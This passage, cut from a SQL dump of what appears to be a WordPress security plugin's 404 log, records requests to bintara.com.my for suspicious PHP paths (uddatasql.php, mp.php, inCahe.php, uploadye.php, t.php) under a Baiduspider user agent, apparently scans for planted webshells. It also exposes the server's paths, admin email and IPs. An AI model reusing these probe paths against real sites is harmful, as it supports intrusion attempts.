";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XoqyUrY9zjNB4MheuUQAAAYk\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XoqyUrY9zjNB4MheuUQAAAYk\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XoqyUrY9zjNB4MheuUQAAAYk\";s:19:\"REDIRECT_SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XoqyUrY9zjNB4MheuUQAAAYk\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"55762\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:55:\"https://bintara.com.my/include/data/fonts/uddatasql.php\";s:10:\"SCRIPT_URL\";s:33:\"/include/data/fonts/uddatasql.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XoqyUrY9zjNB4MheuUQAAAYk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674594.4464\";s:12:\"REQUEST_TIME\";s:10:\"1570674594\";}}','notice','2019-10-10 02:29:56','2019-10-10 02:29:54',35066104,36867248,'https://bintara.com.my/include/data/fonts/uddatasql.php',1,0,'128.5.13.199'),(27813,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"/include/code/mp.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"90.133.29.168\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=76b9de5180b6c1ef085760d611996226\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"90.133.29.168\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XmeBT1onqG4TOWhlFVAAAAQ0\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XmeBT1onqG4TOWhlFVAAAAQ0\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XmeBT1onqG4TOWhlFVAAAAQ0\";s:19:\"REDIRECT_SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XmeBT1onqG4TOWhlFVAAAAQ0\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"55407\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:42:\"https://bintara.com.my/include/code/mp.php\";s:10:\"SCRIPT_URL\";s:20:\"/include/code/mp.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XmeBT1onqG4TOWhlFVAAAAQ0\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674585.5688\";s:12:\"REQUEST_TIME\";s:10:\"1570674585\";}}','notice','2019-10-10 02:29:47','2019-10-10 02:29:46',35064912,36866320,'https://bintara.com.my/include/code/mp.php',1,0,'90.133.29.168'),(27812,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:83:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"231.151.169.109\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=3fb609627fe7e4db56625ddf3c886032\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"231.151.169.109\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:59:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:68:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:73:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:74:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:69:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:72:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:64:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:65:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:60:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:63:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:19:\"REDIRECT_SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"55001\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:75:\"https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:10:\"SCRIPT_URL\";s:53:\"/include/ckeditor/plugins/pagebreak/images/inCahe.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6Xj6yUrY9zjNB4MheuTQAAAYI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1570674575.609\";s:12:\"REQUEST_TIME\";s:10:\"1570674575\";}}','notice','2019-10-10 02:29:38','2019-10-10 02:29:36',35084512,36886776,'https://bintara.com.my/include/ckeditor/plugins/pagebreak/images/inCahe.php',1,0,'231.151.169.109'),(27811,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:71:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:37:\"/images/swfupload/images/uploadye.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:15:\"182.240.223.188\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=23591a7711f47f6bde2bba6c31016c6d\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:15:\"182.240.223.188\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:50:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:55:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:56:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:51:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:54:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XheBT1onqG4TOWhlFEgAAAQQ\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XheBT1onqG4TOWhlFEgAAAQQ\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XheBT1onqG4TOWhlFEgAAAQQ\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XheBT1onqG4TOWhlFEgAAAQQ\";s:19:\"REDIRECT_SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XheBT1onqG4TOWhlFEgAAAQQ\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"54641\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:59:\"https://bintara.com.my/images/swfupload/images/uploadye.php\";s:10:\"SCRIPT_URL\";s:37:\"/images/swfupload/images/uploadye.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ6XheBT1onqG4TOWhlFEgAAAQQ\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570674565.3878\";s:12:\"REQUEST_TIME\";s:10:\"1570674565\";}}','notice','2019-10-10 02:29:27','2019-10-10 02:29:25',35056432,36860464,'https://bintara.com.my/images/swfupload/images/uploadye.php',1,0,'182.240.223.188'),(27810,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:65:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"/data/cache/t.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:14:\"HTTP_CLIENT_IP\";s:13:\"54.138.89.209\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:11:\"HTTP_COOKIE\";s:42:\"icwp-wpsf=011d45e0cb63e1f27424e2e468b094c5\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:21:\"https://www.baidu.com\";s:15:\"HTTP_USER_AGENT\";s:90:\"Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"54.138.89.209\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:41:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:46:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:47:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:42:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:45:\"REDIRECT_REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XeKyUrY9zjNB4MheuSAAAAZU\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:37:\"REDIRECT_REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:38:\"REDIRECT_REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:33:\"REDIRECT_REDIRECT_REDIRECT_STATUS\";s:3:\"200\";s:36:\"REDIRECT_REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XeKyUrY9zjNB4MheuSAAAAZU\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZ6XeKyUrY9zjNB4MheuSAAAAZU\";s:19:\"REDIRECT_SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ6XeKyUrY9zjNB4MheuSAAAAZU\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"183.158.132.12\";s:11:\"REMOTE_PORT\";s:5:\"54196\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:39:\"https://bintara.com.my/data/cache/t.php\";s:10:\"SCRIPT_URL\";s:17:\"/data/cache/t.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s: